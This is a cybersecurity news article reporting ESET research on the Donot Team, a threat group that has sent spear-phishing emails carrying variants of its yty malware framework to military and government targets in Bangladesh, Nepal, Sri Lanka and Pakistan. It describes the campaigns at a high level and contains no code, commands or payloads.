DoNot Team Has Been Targeting Government and Military Entities in South Asia For Years

DoNot Team Has Been Targeting Government and Military Entities in South Asia For Years

A threat actor with ties to an Indian cybersecurity firm has been attacking military organizations in South Asia for the last three years. Since at least September 2020, the actor has been deploying different variants of its malware framework in Bangladesh, Nepal, and Sri Lanka.

According to a Slovakian security firm ESET, the attackers, who are referred to as the Donot Team, have been sending out spear-phishing emails to targeted organizations.

“Donot Team has been consistently targeting the same entities with waves of spear-phishing emails with malicious attachments every two to four months,” researchers Facundo Muñoz and Matías Porolli said.

Also known as APT-C-35 and SectorE02, the Donot Team is suspected of primarily targeting embassies, governments, and military entities in Bangladesh, Sri Lanka, Pakistan, and Nepal with Windows and Android malware since 2016.

In 2021, Amnesty International released evidence linking the Donot Team’s operations to an Indian cybersecurity company known as Innefu Labs that is possibly selling the spyware or offering a hackers-for-hire to governments in the region.

Unlike most attackers who try to re-establish themselves via backdoors in a previously compromised network, the Donot Team takes a different approach by deploying multiple variants of the same malware.

The team’s first attack method is known as yty, which is a series of intermediary downloaders delivered via weaponized Microsoft Office documents that lead to the execution of a backdoor.

Data collected by ESET revealed that the attackers have been using three different variants of yty since September 2020. These include DarkMusical, Gedit, and Jaca.

Another variant, a modified version of Gedit dubbed Henos, was used in the attacks against military organizations in Sri Lanka and Bangladesh from February to March 2021.

“Donot Team makes up for its low sophistication with tenacity,” the researchers concluded. “We expect that it will continue to push on regardless of its many setbacks. Only time will tell if the group evolves its current TTPs and malware.”

About the author

CIM Team

CIM Team

CyberIntelMag is the trusted authority in cybersecurity, comprised of leading industry experts for over 20 years, dedicated to serving cybersecurity professionals. Our goal is to provide a one-stop shop for knowledge and insight needed to navigate throughout today’s emerging cybersecurity landscape through in-depth coverage of breaking news, tutorials, product reviews, videos and industry influencers.